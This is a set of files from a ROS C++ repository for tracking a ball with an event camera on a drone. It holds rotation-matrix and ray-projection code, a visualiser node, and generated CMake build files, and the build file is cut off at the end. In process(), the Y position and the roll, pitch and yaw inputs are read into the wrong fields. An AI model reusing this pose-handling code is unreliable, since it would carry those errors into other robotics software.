"num_lines": 163,
"path": "/src/rayrotation_events.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"rayrotation_events.hpp\"\nusing namespace std;\n\nrayrotation_events::rayrotation_events()\n{\n U_v.x = 1;\n U_v.y = 0;\n U_v.z = 0;\n\n P_b.x = 0.617673;\n P_b.y = 0.2373;\n P_b.z = 1.2239;\n\n x = false;\n y = false;\n\n this->_input_port_0 = new InputPort(ports_id::IP_0_CAMERA, this);\n this->_input_port_1 = new InputPort(ports_id::IP_1_X_POSITION, this);\n this->_input_port_2 = new InputPort(ports_id::IP_2_Y_POSITION, this);\n this->_input_port_3 = new InputPort(ports_id::IP_3_Z_POSITION, this);\n this->_input_port_4 = new InputPort(ports_id::IP_4_ROLL, this);\n this->_input_port_5 = new InputPort(ports_id::IP_5_PITCH, this);\n this->_input_port_6 = new InputPort(ports_id::IP_6_YAW, this);\n this->_output_port = new OutputPort(ports_id::OP_0_DATA, this);\n _ports = {_input_port_0, _input_port_1,_input_port_2 ,_input_port_3,_input_port_4,_input_port_5,_input_port_6,_output_port};\n}\n\nrayrotation_events::~rayrotation_events()\n{\n}\n\nvoid rayrotation_events::process(DataMsg* t_msg, Port* t_port) {\n Vector3DMsg *provider = (Vector3DMsg *)t_msg;\n\n if(t_port->getID() == ports_id::IP_0_CAMERA)\n {\n Vector2DMsg* pixel_location = (Vector2DMsg*) t_msg;\n ball_location.x=pixel_location->data.x;\n ball_location.y=pixel_location->data.y;\n update_camera_angles();\n }\n else if(t_port->getID() == ports_id::IP_1_X_POSITION)\n { \n drone_position.x = provider->data.x;\n }\n else if(t_port->getID() == ports_id::IP_2_Y_POSITION)\n { \n drone_position.y = provider->data.x;\n }\n else if(t_port->getID() == ports_id::IP_3_Z_POSITION)\n { \n drone_position.z = provider->data.z;\n }\n else if(t_port->getID() == ports_id::IP_4_ROLL)\n { \n drone_orientation.x =provider->data.x;\n }\n else if(t_port->getID() == ports_id::IP_5_PITCH)\n { \n drone_orientation.x =provider->data.x;\n }\n else if(t_port->getID() == ports_id::IP_6_YAW)\n { \n drone_orientation.x =provider->data.x;\n }\n}\n\nMatrixXd rayrotation_events::MultiplyMatrices(MatrixXd R_inertia, MatrixXd R_drone)\n{\n\n MatrixXd rotated_matrix(3, 3);\n rotated_matrix(0, 0) = R_drone(0, 0) * R_inertia(0, 0) + R_drone(0, 1) * R_inertia(1, 0) + R_drone(0, 2) * R_inertia(2, 0);\n\n rotated_matrix(1, 0) = R_drone(1, 0) * R_inertia(0, 0) + R_drone(1, 1) * R_inertia(1, 0) + R_drone(1, 2) * R_inertia(2, 0);\n\n rotated_matrix(2, 0) = R_drone(2, 0) * R_inertia(0, 0) + R_drone(2, 1) * R_inertia(1, 0) + R_drone(2, 2) * R_inertia(2, 0);\n\n rotated_matrix(0, 1) = R_drone(0, 0) * R_inertia(0, 1) + R_drone(0, 1) * R_inertia(1, 1) + R_drone(0, 2) * R_inertia(2, 1);\n\n rotated_matrix(1, 1) = R_drone(1, 0) * R_inertia(0, 1) + R_drone(1, 1) * R_inertia(1, 1) + R_drone(1, 2) * R_inertia(2, 1);\n\n rotated_matrix(2, 1) = R_drone(2, 0) * R_inertia(0, 1) + R_drone(2, 1) * R_inertia(1, 1) + R_drone(2, 2) * R_inertia(2, 1);\n\n rotated_matrix(0, 2) = R_drone(0, 0) * R_inertia(0, 2) + R_drone(0, 1) * R_inertia(1, 2) + R_drone(0, 2) * R_inertia(2, 2);\n\n rotated_matrix(1, 2) = R_drone(1, 0) * R_inertia(0, 2) + R_drone(1, 1) * R_inertia(1, 2) + R_drone(1, 2) * R_inertia(2, 2);\n\n rotated_matrix(2, 2) = R_drone(2, 0) * R_inertia(0, 2) + R_drone(2, 1) * R_inertia(1, 2) + R_drone(2, 2) * R_inertia(2, 2);\n return rotated_matrix;\n}\n\nVector3D<float> rayrotation_events::Update_unit_vector(MatrixXd rotated_matrix)\n{\n Vector3D<float> t_results;\n t_results.x = U_v.x * rotated_matrix(0, 0) + U_v.y * rotated_matrix(0, 1) + U_v.z * rotated_matrix(0, 2);\n t_results.y = U_v.x * rotated_matrix(1, 0) + U_v.y * rotated_matrix(1, 1) + U_v.z * rotated_matrix(1, 2);\n t_results.z = U_v.x * rotated_matrix(2, 0) + U_v.y * rotated_matrix(2, 1) + U_v.z * rotated_matrix(2, 2);\n\n obj_pos.x=0;\n obj_pos.y =-1*t_results.y*100;\n obj_pos.z=-1*t_results.z*100;\n\n Vector3DMsg point_msg;\n point_msg.data = obj_pos;\n this->_output_port->receiveMsgData(&point_msg);\n\n return t_results;\n}\n\nvoid rayrotation_events::scale_and_translate()\n{\n Vector3D<float> t_results;\n t_results.x = P_b.x - drone_position.x;\n t_results.y = P_b.y - drone_position.y;\n t_results.z = P_b.z - drone_position.z;\n \n double t_s = Vector3D<float>::getL2Norm(t_results);\n \n rotated_unit_vector.x = t_s * rotated_unit_vector.x;\n rotated_unit_vector.y = t_s * rotated_unit_vector.y;\n rotated_unit_vector.z = t_s * rotated_unit_vector.z;\n\n\n\n rotated_unit_vector.x = rotated_unit_vector.x+drone_position.x;\n rotated_unit_vector.y = rotated_unit_vector.y+drone_position.y;\n rotated_unit_vector.z = rotated_unit_vector.z+drone_position.z;\n\n rotated_unit_vector.x = rotated_unit_vector.x-P_b.x;\n rotated_unit_vector.y = rotated_unit_vector.y-P_b.y;\n rotated_unit_vector.z = rotated_unit_vector.z-P_b.z;\n\n\n}\n\nvoid rayrotation_events::update_camera_angles()\n{\n float theta_yaw = -(0.6270 / 346.0) * ball_location.x;//1.45\n float theta_roll = (0.4805 / 260.0) * ball_location.y;//1.19\n\n camera_angle.x = theta_roll;\n camera_angle.y = 0;\n camera_angle.z = theta_yaw;\n\n this->update_rotation_matrices();\n}\n\nvoid rayrotation_events::update_rotation_matrices() \n{\n\n MatrixXd R_drone(3, 3);\n MatrixXd R_inertia(3, 3);\n MatrixXd rotated_matrix(3, 3);\n\n R_inertia = R_o_d.Update(drone_orientation); //Create the rotation matrices\n R_drone = R_d_c.Update(camera_angle);\n\n rotated_matrix = MultiplyMatrices(R_inertia, R_drone); //Multiply the rotation matrices;\n\n rotated_unit_vector = Update_unit_vector(rotated_matrix);\n\n scale_and_translate();\n}\n"
},
{
"alpha_fraction": 0.5420054197311401,
"alphanum_fraction": 0.6043360233306885,
"avg_line_length": 27.41025733947754,
"blob_id": "6b47496829aab4ffaacf430395445101d1f1dd6d",
"content_id": "e3e573670d23e53b39ff77e27b6a33d492ece469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1107,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 39,
"path": "/src/RotationMatrix3by3.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"RotationMatrix3by3.hpp\"\nusing namespace std;\nusing Eigen::MatrixXd;\n\nRotationMatrix3by3::RotationMatrix3by3(/* args */){\n}\n\nRotationMatrix3by3::~RotationMatrix3by3(){\n}\n\nMatrixXd RotationMatrix3by3::Update(Vector3D<float> t_input)\n{ \n \n Matrix3by3::v1.x = cos(t_input.x)*cos(t_input.z) - sin(t_input.x)*sin(t_input.y)*sin(t_input.z);\n Matrix3by3::v1.y = sin(t_input.z)*cos(t_input.y);\n Matrix3by3::v1.z = -sin(t_input.x)*cos(t_input.z)-cos(t_input.x)*sin(t_input.y)*sin(t_input.z);\n\n Matrix3by3::v2.x = -cos(t_input.x)*sin(t_input.z) - sin(t_input.x)*sin(t_input.y)*cos(t_input.z);\n Matrix3by3::v2.y = cos(t_input.z)*cos(t_input.y);\n Matrix3by3::v2.z = sin(t_input.x)*sin(t_input.z)-cos(t_input.x)*sin(t_input.y)*cos(t_input.z);\n\n Matrix3by3::v3.x = sin(t_input.x)*cos(t_input.y);\n Matrix3by3::v3.y = sin(t_input.y);\n Matrix3by3::v3.z = cos(t_input.x)*cos(t_input.y);\n\n MatrixXd m(3,3);\n\n m(0,0)=v1.x;\n m(1,0)=v1.y;\n m(2,0)=v1.z;\n m(0,1)=v2.x;\n m(1,1)=v2.y;\n m(2,1)=v2.z;\n m(0,2)=v3.x;\n m(1,2)=v3.y;\n m(2,2)=v3.z;\n\n return m;\n}"
},
{
"alpha_fraction": 0.719763994216919,
"alphanum_fraction": 0.7271386384963989,
"avg_line_length": 22.413793563842773,
"blob_id": "815ebf8778f0f571a43857eb81b86736f47762ce",
"content_id": "25360c747ed981e8046570cfb3a4f43ce959034a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 29,
"path": "/include/Event_vis.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <image_transport/image_transport.h>\n#include <cv_bridge/cv_bridge.h>\n#include <sensor_msgs/image_encodings.h>\n#include \"sensor_msgs/Image.h\"\n#include <opencv2/imgproc/imgproc.hpp>\n#include <opencv2/highgui/highgui.hpp>\n#include <opencv2/core/types.hpp>\n#include <dvs_msgs/EventArray.h>\n#include <cmath>\n#include \"std_msgs/Float32.h\"\n#include <ros/ros.h>\n\nclass Event_vis\n{\n public:\n ros::NodeHandle nh_;\n ros::Subscriber sub;\n image_transport::ImageTransport it_;\n image_transport::Publisher pub;\n\n\n const std::string OPENCV_WINDOW = \"Image window\";\n\n Event_vis(ros::NodeHandle &);\n ~Event_vis();\n\n void Events(dvs_msgs::EventArray msg);\n};"
},
{
"alpha_fraction": 0.6335577964782715,
"alphanum_fraction": 0.6526374816894531,
"avg_line_length": 31.418182373046875,
"blob_id": "e80ace53ae7d8f6ab54764513f5b4f8f1c456bf6",
"content_id": "6b1402c345042d1c8c73f315320082b752ab8ad9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1782,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 55,
"path": "/include/rayrotation_events.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"HEAR_math/Matrix3by3.hpp\"\n#include \"RotationMatrix3by3.hpp\"\n#include <opencv2/core/types.hpp>\n#include \"HEAR_msg/FloatMsg.hpp\"\n#include <iostream>\n#include \"std_msgs/UInt64.h\"\n#include <math.h>\n#include <eigen3/Eigen/Dense>\n#include \"HEAR_math/Vector3D.hpp\"\n#include \"HEAR_msg/Vector2DMsg.hpp\"\n#include \"HEAR_msg/Vector3DMsg.hpp\"\n#include <ros/ros.h>\n#include \"HEAR_core/InputPort.hpp\"\n#include \"HEAR_core/OutputPort.hpp\"\n#include \"HEAR_core/Block.hpp\"\n\n\nusing Eigen::MatrixXd;\n\nclass rayrotation_events : public Block\n{\n private:\n Port* _input_port_0;\n Port* _input_port_1;\n Port* _input_port_2;\n Port* _input_port_3;\n Port* _input_port_4;\n Port* _input_port_5;\n Port* _input_port_6;\n Port* _output_port;\n public:\n cv::Point2f ball_location;\n RotationMatrix3by3 R_o_d,R_d_c;\n ros::Time time;\n Vector3D<float> drone_position, drone_orientation,U_v,P_b,camera_angle,rotated_unit_vector;\n MatrixXd MultiplyMatrices(MatrixXd R_inertia, MatrixXd R_drone);\n void scale_and_translate();\n FloatMsg z_parameter,y_parameter,x_parameter;\n Vector3DMsg camera_parameters;\n Vector3DMsg all_parameters;\n Vector3D<float> obj_pos;\n void process(DataMsg* t_msg, Port* t_port);\n Vector3D<float> Update_unit_vector(MatrixXd);\n void update_camera_angles();\n void update_rotation_matrices();\n rayrotation_events();\n bool x,y;\n enum ports_id {IP_0_CAMERA, IP_1_X_POSITION,IP_2_Y_POSITION,IP_3_Z_POSITION,IP_4_ROLL,IP_5_PITCH,IP_6_YAW,OP_0_DATA};\n\n \n\n enum receiving_channels {ch_x, ch_y, ch_z, ch_roll, ch_pitch, ch_yaw,camera,ch_camera_x,ch_camera_y};\n ~rayrotation_events();\n};"
},
{
"alpha_fraction": 0.7454195022583008,
"alphanum_fraction": 0.7492767572402954,
"avg_line_length": 63.875,
"blob_id": "c9fa014a107b31d8e09e608e5ed7ca434a605480",
"content_id": "2daf0186c7b34180c9e147f9f3c50cafbeb40ad8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1037,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 16,
"path": "/build/catkin_generated/package.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"davis_corner\")\nset(davis_corner_VERSION \"0.0.0\")\nset(davis_corner_MAINTAINER \"oussama <[email protected]>\")\nset(davis_corner_PACKAGE_FORMAT \"2\")\nset(davis_corner_BUILD_DEPENDS \"std_msgs\" \"hear_ros_bridge\" \"message_generation\" \"cv_bridge\" \"image_transport\" \"roscpp\" \"sensor_msgs\")\nset(davis_corner_BUILD_EXPORT_DEPENDS \"cv_bridge\" \"image_transport\" \"roscpp\" \"sensor_msgs\" \"std_msgs\" \"hear_ros_bridge\")\nset(davis_corner_BUILDTOOL_DEPENDS \"catkin\" \"catkin_simple\")\nset(davis_corner_BUILDTOOL_EXPORT_DEPENDS )\nset(davis_corner_EXEC_DEPENDS \"cv_bridge\" \"image_transport\" \"roscpp\" \"sensor_msgs\" \"std_msgs\" \"dvs_msgs\" \"eigen_catkin\" \"message_runtime\" \"hear_ros_bridge\")\nset(davis_corner_RUN_DEPENDS \"cv_bridge\" \"image_transport\" \"roscpp\" \"sensor_msgs\" \"std_msgs\" \"dvs_msgs\" \"eigen_catkin\" \"message_runtime\" \"hear_ros_bridge\")\nset(davis_corner_TEST_DEPENDS )\nset(davis_corner_DOC_DEPENDS )\nset(davis_corner_URL_WEBSITE \"\")\nset(davis_corner_URL_BUGTRACKER \"\")\nset(davis_corner_URL_REPOSITORY \"\")\nset(davis_corner_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.5907723307609558,
"alphanum_fraction": 0.614844560623169,
"avg_line_length": 25.945945739746094,
"blob_id": "fbb7402a397d83b09ef46a9d7fb94c88b7f9dd2f",
"content_id": "055dba2e94f01bed5c07bbd099a3cc9ab6c3dfd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 997,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 37,
"path": "/src/Event_vis.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"Event_vis.hpp\"\n\nEvent_vis::Event_vis(ros::NodeHandle &t_nh):it_(nh_)\n{\n\n nh_ = t_nh;\n sub = nh_.subscribe(\"/dvs/events\", 1, &Event_vis::Events,this);\n pub=it_.advertise(\"/EventsImage\",1);\n //cv::namedWindow(OPENCV_WINDOW);\n}\n\nEvent_vis::~Event_vis()\n{\n //cv::destroyWindow(OPENCV_WINDOW);\n}\n\nvoid Event_vis::Events(dvs_msgs::EventArray msg)\n{\n cv::Mat EventsWindow = cv::Mat::zeros(260, 346, CV_8UC1);\n cv_bridge::CvImage img_bridge;\n sensor_msgs::Image img_msg;\n\n for (int i = 0; i < msg.events.size(); i++)\n {\n cv::circle(EventsWindow, cv::Point(msg.events[i].x, msg.events[i].y), 2.0, cv::Scalar(255, 0, 0), -1, 8);\n }\n\n std_msgs::Header header;\n header.seq = 1;\n header.stamp= ros::Time::now();\n img_bridge=cv_bridge::CvImage(header, sensor_msgs::image_encodings::TYPE_8UC1, EventsWindow);\n img_bridge.toImageMsg(img_msg);\n pub.publish(img_msg);\n \n // cv::imshow(\"EventsWindow\", EventsWindow);\n // cv::waitKey(1);\n}\n"
},
{
"alpha_fraction": 0.6941386461257935,
"alphanum_fraction": 0.696578323841095,
"avg_line_length": 37.61915969848633,
"blob_id": "af38a376138b9c8b1c6b40a6f8453b92d6c5f198",
"content_id": "648479d9d119d78efcfe66d115a5b469c5f964bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 48777,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 1263,
"path": "/build/Makefile",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.10\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/ku-t2/catkin_ws_eventcamera/src/davis_corner\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"No interactive CMake dialog available...\"\n\t/usr/bin/cmake -E echo No\\ interactive\\ CMake\\ dialog\\ available.\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local/fast\n\n# The main all target\nall: cmake_check_build_system\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/CMakeFiles /home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/CMakeFiles/progress.marks\n\t$(MAKE) -f CMakeFiles/Makefile2 all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/ku-t2/catkin_ws_eventcamera/src/davis_corner/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\t$(MAKE) -f CMakeFiles/Makefile2 clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\t$(MAKE) -f CMakeFiles/Makefile2 preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\t$(MAKE) -f CMakeFiles/Makefile2 preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n#=============================================================================\n# Target rules for targets named davis_corner_genpy\n\n# Build rule for target.\ndavis_corner_genpy: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_genpy\n.PHONY : davis_corner_genpy\n\n# fast build rule for target.\ndavis_corner_genpy/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_genpy.dir/build.make CMakeFiles/davis_corner_genpy.dir/build\n.PHONY : davis_corner_genpy/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_py\n\n# Build rule for target.\ndavis_corner_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_py\n.PHONY : davis_corner_generate_messages_py\n\n# fast build rule for target.\ndavis_corner_generate_messages_py/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_py.dir/build.make CMakeFiles/davis_corner_generate_messages_py.dir/build\n.PHONY : davis_corner_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_nodejs\n\n# Build rule for target.\ndavis_corner_generate_messages_nodejs: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_nodejs\n.PHONY : davis_corner_generate_messages_nodejs\n\n# fast build rule for target.\ndavis_corner_generate_messages_nodejs/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_nodejs.dir/build.make CMakeFiles/davis_corner_generate_messages_nodejs.dir/build\n.PHONY : davis_corner_generate_messages_nodejs/fast\n\n#=============================================================================\n# Target rules for targets named ball_detector_node\n\n# Build rule for target.\nball_detector_node: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 ball_detector_node\n.PHONY : ball_detector_node\n\n# fast build rule for target.\nball_detector_node/fast:\n\t$(MAKE) -f CMakeFiles/ball_detector_node.dir/build.make CMakeFiles/ball_detector_node.dir/build\n.PHONY : ball_detector_node/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_genlisp\n\n# Build rule for target.\ndavis_corner_genlisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_genlisp\n.PHONY : davis_corner_genlisp\n\n# fast build rule for target.\ndavis_corner_genlisp/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_genlisp.dir/build.make CMakeFiles/davis_corner_genlisp.dir/build\n.PHONY : davis_corner_genlisp/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_lisp\n\n# Build rule for target.\ndavis_corner_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_lisp\n.PHONY : davis_corner_generate_messages_lisp\n\n# fast build rule for target.\ndavis_corner_generate_messages_lisp/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_lisp.dir/build.make CMakeFiles/davis_corner_generate_messages_lisp.dir/build\n.PHONY : davis_corner_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_eus\n\n# Build rule for target.\ndavis_corner_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_eus\n.PHONY : davis_corner_generate_messages_eus\n\n# fast build rule for target.\ndavis_corner_generate_messages_eus/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_eus.dir/build.make CMakeFiles/davis_corner_generate_messages_eus.dir/build\n.PHONY : davis_corner_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named davis_corner_generate_messages_cpp\n\n# Build rule for target.\ndavis_corner_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 davis_corner_generate_messages_cpp\n.PHONY : davis_corner_generate_messages_cpp\n\n# fast build rule for target.\ndavis_corner_generate_messages_cpp/fast:\n\t$(MAKE) -f CMakeFiles/davis_corner_generate_messages_cpp.dir/build.make CMakeFiles/davis_corner_generate_messages_cpp.dir/build\n.PHONY : davis_corner_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named _davis_corner_generate_messages_check_deps_Corners\n\n# Build rule for target.\n_davis_corner_generate_messages_check_deps_Corners: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _davis_corner_generate_messages_check_deps_Corners\n.PHONY : _davis_corner_generate_messages_check_deps_Corners\n\n# fast build rule for target.\n_davis_corner_generate_messages_check_deps_Corners/fast:\n\t$(MAKE) -f CMakeFiles/_davis_corner_generate_messages_check_deps_Corners.dir/build.make CMakeFiles/_davis_corner_generate_messages_check_deps_Corners.dir/build\n.PHONY : _davis_corner_generate_messages_check_deps_Corners/fast\n\n#=============================================================================\n# Target rules for targets named hear_msgs_generate_messages_py\n\n# Build rule for target.\nhear_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 hear_msgs_generate_messages_py\n.PHONY : hear_msgs_generate_messages_py\n\n# fast build rule for target.\nhear_msgs_generate_messages_py/fast:\n\t$(MAKE) -f CMakeFiles/hear_msgs_generate_messages_py.dir/build.make CMakeFiles/hear_msgs_generate_messages_py.dir/build\n.PHONY : hear_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named hear_msgs_generate_messages_nodejs\n\n# Build rule for target.\nhear_msgs_generate_messages_nodejs: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 hear_msgs_generate_messages_nodejs\n.PHONY : hear_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nhear_msgs_generate_messages_nodejs/fast:\n\t$(MAKE) -f CMakeFiles/hear_msgs_generate_messages_nodejs.dir/build.make CMakeFiles/hear_msgs_generate_messages_nodejs.dir/build\n.PHONY : hear_msgs_generate_messages_nodejs/fast\n\n#=============================================================================\n# Target rules for targets named hear_msgs_generate_messages_eus\n\n# Build rule for target.\nhear_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 hear_msgs_generate_messages_eus\n.PHONY : hear_msgs_generate_messages_eus\n\n# fast build rule for target.\nhear_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f CMakeFiles/hear_msgs_generate_messages_eus.dir/build.make CMakeFiles/hear_msgs_generate_messages_eus.dir/build\n.PHONY : hear_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_nodejs\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_nodejs: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_nodejs\n.PHONY : rosgraph_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_nodejs/fast:\n\t$(MAKE) -f CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/build.make CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/build\n.PHONY : rosgraph_msgs_generate_messages_nodejs/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_py\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_py\n.PHONY : rosgraph_msgs_generate_messages_py\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_py/fast:\n\t$(MAKE) -f CMakeFiles/rosgraph_msgs_generate_messages_py.dir/build.make CMakeFiles/rosgraph_msgs_generate_messages_py.dir/build\n.PHONY : rosgraph_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named std_msgs_generate_messages_eus\n\n# Build rule for target.\nstd_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 std_msgs_generate_messages_eus\n.PHONY : std_msgs_generate_messages_eus\n\n# fast build rule for target.\nstd_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f CMakeFiles/std_msgs_generate_messages_eus.dir/build.make CMakeFiles/std_msgs_generate_messages_eus.dir/build\n.PHONY : 